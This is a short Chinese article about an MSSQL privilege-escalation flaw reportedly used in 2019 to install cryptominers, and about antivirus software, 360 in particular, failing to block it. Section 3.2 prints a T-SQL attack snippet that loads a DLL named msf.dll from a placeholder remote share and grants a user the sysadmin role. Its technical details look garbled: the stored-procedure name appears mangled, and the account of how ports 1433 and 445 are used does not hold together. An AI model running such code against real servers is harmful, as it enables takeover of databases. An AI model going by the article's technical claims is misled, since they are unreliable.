1. 引言
电脑安全问题一直是备受关注的话题,特别是在如今万物互联的时代,数据安全的重要性更是不言而喻。而杀毒软件(Antivirus Software)作为防御电脑病毒的常用工具,具有着重要的作用。然而,在实际应用过程中,杀毒软件也会存在种种问题,比如“杀不死”的病毒和提权漏洞等。本文将讨论近期出现的MSSQL提权漏洞,以及杀毒360在阻止该漏洞攻击方面的无力表现。
2. 背景
在2019年的10月份,360CERT监测到黑灰产业链相关方向的攻击组织利用某MSSQL提权漏洞展开的围攻行动。攻击组织通过获取MSSQL服务器上的系统管理员权限,成功恶意导入挖矿程序完成非法盈利。而杀毒软件在该攻击过程中未能对漏洞进行有效的拦截。
3. MSSQL提权漏洞
3.1 简介
Microsoft SQL Server(MSSQL)是Microsoft公司推出的一款关系型数据库管理系统。但在2019年10月份,360CERT监测到存在MSSQL服务器提权漏洞,攻击者可通过该漏洞获取数据库管理员权限进行非法操作。
3.2 漏洞版本与利用方法
该漏洞仅影响SQLServer 2012, 2014, 2016版本。攻击者需要通过SQLServer服务和文件共享服务两个端口,分别是1433/Tcp和445/Tcp获取用户和密码,并在远程服务器端运行一段恶意文件完成提权操作。
declare @v varchar(8000);
SELECT @v=@@version;
if(CHARINDEX('x64',@v,1)>0) BEGIN
execute master..sp_replwritetovarbin0_0 'x','\\IP\SHARE\windows\temp\msf.dll';
EXEC master.dbo.sp_addsrvrolemember @loginame='DOMAIN\USER', @rolename='sysadmin';
END
3.3 修补措施
目前,Microsoft已经发布了最新的MSSQL Server 2016更新,以修补该漏洞。对于旧版本的MSSQL,则需要进行补丁更新,且建议使用强密码、双因素认证等措施加强安全防范。
4. 杀毒360杀毒无力阻止MSSQL提权
4.1 杀毒软件的病毒库限制
杀毒软件主要是通过病毒库中的相关特征码来检测和清除病毒,黑客使用新的技术手段对病毒进行加壳、加密等操作,导致病毒无法被杀毒软件检测到。更重要的是,对于未曾发现的漏洞和特征码,杀毒软件也难以防范。
4.2 MSSQL提权漏洞的覆盖范围
杀毒软件通常只能针对在本地运行的程序进行检测和清除,而MSSQL提权漏洞的攻击者并不需要在本地运行程序,只需要通过网络访问受攻击MSSQL数据库即可完成攻击行动,因此杀毒软件作为本地防护性工具,难以对远程攻击行为进行有效拦截。
4.3 杀毒软件的不足
当前,杀毒软件除检测病毒外,还提供了一些系统保护和安全防范措施。然而,杀毒软件在处理潜在威胁时常常存在误判(误将正常程序当作病毒)和误杀(杀掉正常程序造成误操作)的情况发生,给用户带来了不必要的麻烦。
5. 结论
在如今高科技威胁不断的网络环境中,杀毒软件已经成为非常重要的安全工具。虽然杀毒软件在一定程度上可以保护计算机的安全,但因软件局限性、对漏洞和未知特征码的防范不足等原因,仍存在一定的漏洞和安全隐患。因此,在使用杀毒软件的同时,我们还应加强自身的安全意识和行为习惯,及时更新系统补丁和杀毒软件病毒库,不轻易打开可疑的邮件和文件,避免泄露个人信息和重要密码等信息。